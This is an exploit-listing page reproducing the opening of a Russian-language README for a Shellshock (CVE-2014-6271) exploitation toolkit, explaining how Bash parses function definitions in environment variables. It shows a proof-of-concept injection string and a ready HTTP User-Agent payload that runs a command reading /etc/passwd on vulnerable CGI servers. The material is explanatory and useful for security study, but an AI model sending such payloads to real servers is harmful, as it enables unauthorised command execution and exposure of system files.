Sploitus

Exploit for bash-apocalypse

kitploit Β· 2026-08-24

Exploit Code

MARKDOWN35 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MTAHA-SEC-BASH-APOCALYPSE
# Bash Apocalypse

**Автоматизированный инструмСнтарий для эксплуатации CVE-2014-6271 (Shellshock)**

![Severity](https://img.shields.io/badge/Severity-CRITICAL-red) ![CVSS Score](https://img.shields.io/badge/CVSS-10.0-critical)

ΠŸΠΎΠ»Π½ΠΎΡ†Π΅Π½Π½Ρ‹ΠΉ ΠΈΡΡΠ»Π΅Π΄ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΡΠΊΠΈΠΉ ΠΏΡ€ΠΎΠ΅ΠΊΡ‚ Π² области бСзопасности, Π΄Π΅ΠΌΠΎΠ½ΡΡ‚Ρ€ΠΈΡ€ΡƒΡŽΡ‰ΠΈΠΉ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Shellshock, которая Π² 2014 Π³ΠΎΠ΄Ρƒ Π·Π°Ρ‚Ρ€ΠΎΠ½ΡƒΠ»Π° ΠΌΠΈΠ»Π»ΠΈΠΎΠ½Ρ‹ сСрвСров. Π’ΠΊΠ»ΡŽΡ‡Π°Π΅Ρ‚ автоматичСскоС сканированиС, возмоТности эксплуатации ΠΈ Ρ€Π΅ΠΊΠΎΠΌΠ΅Π½Π΄Π°Ρ†ΠΈΠΈ ΠΏΠΎ Π·Π°Ρ‰ΠΈΡ‚Π΅.

Demo

* * *

## Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ Shellshock?

Shellshock (CVE-2014-6271) β€” критичСская ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π² ΠΊΠΎΠΌΠ°Π½Π΄Π½ΠΎΠΉ ΠΎΠ±ΠΎΠ»ΠΎΡ‡ΠΊΠ΅ Bash, ΠΏΠΎΠ·Π²ΠΎΠ»ΡΡŽΡ‰Π°Ρ ΡƒΠ΄Π°Π»Ρ‘Π½Π½ΠΎ Π²Ρ‹ΠΏΠΎΠ»Π½ΡΡ‚ΡŒ ΠΊΠΎΠ΄ ΠΏΡƒΡ‚Ρ‘ΠΌ манипуляции ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹ΠΌΠΈ окруТСния. ΠžΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½Π½Π°Ρ Π² 2014 Π³ΠΎΠ΄Ρƒ послС 22 Π»Π΅Ρ‚ сущСствования, ΠΎΠ½Π° Π·Π°Ρ‚Ρ€ΠΎΠ½ΡƒΠ»Π° ΠΌΠΈΠ»Π»ΠΈΠΎΠ½Ρ‹ систСм Unix/Linux ΠΏΠΎ всСму ΠΌΠΈΡ€Ρƒ.

**Как это Ρ€Π°Π±ΠΎΡ‚Π°Π΅Ρ‚:**

root@kitploit:~
    
    
    # Normal: Bash exports functions as environment variables
    my_function='() { echo "hello"; }'
    
    # The bug: Bash continues parsing after the function definition
    exploit='() { :;}; echo "PWNED"'  # The second command executes
    

Π’Π΅Π±-сСрвСры, ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‰ΠΈΠ΅ CGI, ΠΏΠ΅Ρ€Π΅Π΄Π°ΡŽΡ‚ HTTP-Π·Π°Π³ΠΎΠ»ΠΎΠ²ΠΊΠΈ Π² Bash ΠΊΠ°ΠΊ ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹Π΅ окруТСния, Ρ‡Ρ‚ΠΎ Π΄Π΅Π»Π°Π΅Ρ‚ ΠΈΡ… уязвимыми:

root@kitploit:~
    
    
    User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'